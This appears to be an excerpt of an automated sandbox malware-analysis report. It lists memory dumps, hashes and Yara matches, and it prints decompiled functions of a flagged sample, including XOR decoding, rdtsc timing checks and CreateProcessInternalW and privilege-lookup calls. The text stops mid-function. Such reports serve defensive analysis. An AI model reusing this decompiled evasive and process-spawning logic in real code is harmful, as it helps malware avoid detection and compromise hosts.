                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 95%
                                                                                        			E004088B0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t50;
				intOrPtr* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;

				_t53 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t53,  &_v24); // executed
				_t57 = _t56 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t58 = _t57 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						_t47 =  &_v284;
						E0041A340( &_v284,  &_v804);
						_t59 = _t58 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(_t39, _t47, __eflags, E00413D70(_t53, _t50),  &_v284);
							_t59 = _t59 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							__eflags = _t50 - 0x62;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E00407040( &_v24,  &_v840);
							_t58 = _t59 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t53 + 0x14; // 0xffffe1a5
						_t10 = _t53 + 0x474;
						 *_t10 =  *(_t53 + 0x474) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E004070C0(_t53,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t53 + 0x55c;
						 *_t16 =  *(_t53 + 0x55c) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t53 + 0x31)) =  *((intOrPtr*)(_t53 + 0x31)) + _t39;
					_t20 = _t53 + 0x31; // 0x5608758b
					_t21 = _t53 + 0x32;
					 *_t21 =  *(_t53 + 0x32) +  *_t20 + 1;
					__eflags =  *_t21;
					 *1 = 1 +  *1;
					 *1 = 1 +  *1;
					__eflags =  *1;
					return 1;
				} else {
					return _t24;
				}
			}




















                                                                                        0x004088bb
                                                                                        0x004088c3
                                                                                        0x004088c5
                                                                                        0x004088ca
                                                                                        0x004088cf
                                                                                        0x004088e2
                                                                                        0x004088e7
                                                                                        0x004088f0
                                                                                        0x004088fc
                                                                                        0x00408908
                                                                                        0x0040890f
                                                                                        0x00408914
                                                                                        0x00408917
                                                                                        0x00408920
                                                                                        0x00408932
                                                                                        0x00408937
                                                                                        0x0040893a
                                                                                        0x0040893c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040893e
                                                                                        0x0040893f
                                                                                        0x00408942
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408944
                                                                                        0x00408951
                                                                                        0x0040895c
                                                                                        0x00408961
                                                                                        0x00408964
                                                                                        0x00408966
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408966
                                                                                        0x00408946
                                                                                        0x00408949
                                                                                        0x00408949
                                                                                        0x00408949
                                                                                        0x0040894f
                                                                                        0x00000000
                                                                                        0x00408968
                                                                                        0x00408968
                                                                                        0x00408968
                                                                                        0x0040896c
                                                                                        0x00408971
                                                                                        0x0040897a
                                                                                        0x0040897c
                                                                                        0x0040897e
                                                                                        0x00408984
                                                                                        0x00408988
                                                                                        0x0040898b
                                                                                        0x0040898b
                                                                                        0x0040898b
                                                                                        0x0040898b
                                                                                        0x00408992
                                                                                        0x00408995
                                                                                        0x0040899a
                                                                                        0x0040899a
                                                                                        0x0040899a
                                                                                        0x0040899f
                                                                                        0x004089a1
                                                                                        0x004089a1
                                                                                        0x004089a7
                                                                                        0x004088d1
                                                                                        0x004088d6
                                                                                        0x004088d6

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                        • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                        • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                        • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 74%
                                                                                        			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409280(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                        0x00407260
                                                                                        0x0040726f
                                                                                        0x00407273
                                                                                        0x0040727e
                                                                                        0x0040728e
                                                                                        0x0040729e
                                                                                        0x004072a3
                                                                                        0x004072aa
                                                                                        0x004072ac
                                                                                        0x004072ad
                                                                                        0x004072ba
                                                                                        0x004072bc
                                                                                        0x004072be
                                                                                        0x004072db
                                                                                        0x004072db
                                                                                        0x00000000
                                                                                        0x004072dd
                                                                                        0x004072e2

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                        • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                        • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                        • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041853D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 16%
                                                                                        			E0041853D(intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56) {
				void* _t22;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;

				asm("das");
				_t16 = _a8;
				_t36 = _a8 + 0xc80;
				E00418DC0(_t34, _t16, _t36,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _a56, 0x8bec8b55, _t38); // executed
				return _t22;
			}







                                                                                        0x0041853d
                                                                                        0x00418543
                                                                                        0x00418552
                                                                                        0x0041855a
                                                                                        0x00418594
                                                                                        0x00418598

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418594
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 636e809e4d346850e0f6b96f504b2dbe59488ed12d58087113ba427c9fe42fcc
                                                                                        • Instruction ID: fd14887d46efc5f9d335df3f211abd6110ae7a52d641cf2f9f6f9d483a339ed8
                                                                                        • Opcode Fuzzy Hash: 636e809e4d346850e0f6b96f504b2dbe59488ed12d58087113ba427c9fe42fcc
                                                                                        • Instruction Fuzzy Hash: 4D01F2B6204109ABCB04CF88DC80DEB77A9AF8C314F25865DFA4D97241C634E8418BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00418540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 37%
                                                                                        			E00418540(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t34 = _a4 + 0xc80;
				E00418DC0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}






                                                                                        0x00418543
                                                                                        0x00418552
                                                                                        0x0041855a
                                                                                        0x00418594
                                                                                        0x00418598

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418594
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                        • Instruction ID: ccd65e455a6766b961bfcedf9323f9111758d35f24f5cf189e0879c04bc11aef
                                                                                        • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                        • Instruction Fuzzy Hash: B5015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00418623, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 37%
                                                                                        			E00418623(void* __eax, void* __ebx, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t22;
				signed int _t33;

				asm("out dx, eax");
				asm("out dx, al");
				 *(__edi + 0x5f209d61 + _t33 * 4) =  *(__edi + 0x5f209d61 + _t33 * 4) >> 1;
				asm("clc");
				asm("fist word [ebp-0x75]");
				_push(_t33);
				_t19 = _a4;
				E00418DC0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t19 + 0xa18)), 0, 0x46);
				_t22 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t22;
			}





                                                                                        0x00418623
                                                                                        0x00418624
                                                                                        0x00418625
                                                                                        0x0041862e
                                                                                        0x0041862f
                                                                                        0x00418630
                                                                                        0x00418633
                                                                                        0x0041864a
                                                                                        0x00418660
                                                                                        0x00418664

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 08ea033116476ba5f39cf0f53817b6bb1254e0455013debeebbc846f6919fc72
                                                                                        • Instruction ID: 8ff986ee01ff1b6fd8ab1a2af9718bf615327383fc2791ecc3c65447a914c0a0
                                                                                        • Opcode Fuzzy Hash: 08ea033116476ba5f39cf0f53817b6bb1254e0455013debeebbc846f6919fc72
                                                                                        • Instruction Fuzzy Hash: F8F0A0B1608204AFDB20EF59CC85EE7376EEF55394F044159F90D97241CB31A800CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004184C2, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 58%
                                                                                        			E004184C2(void* __ebx, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
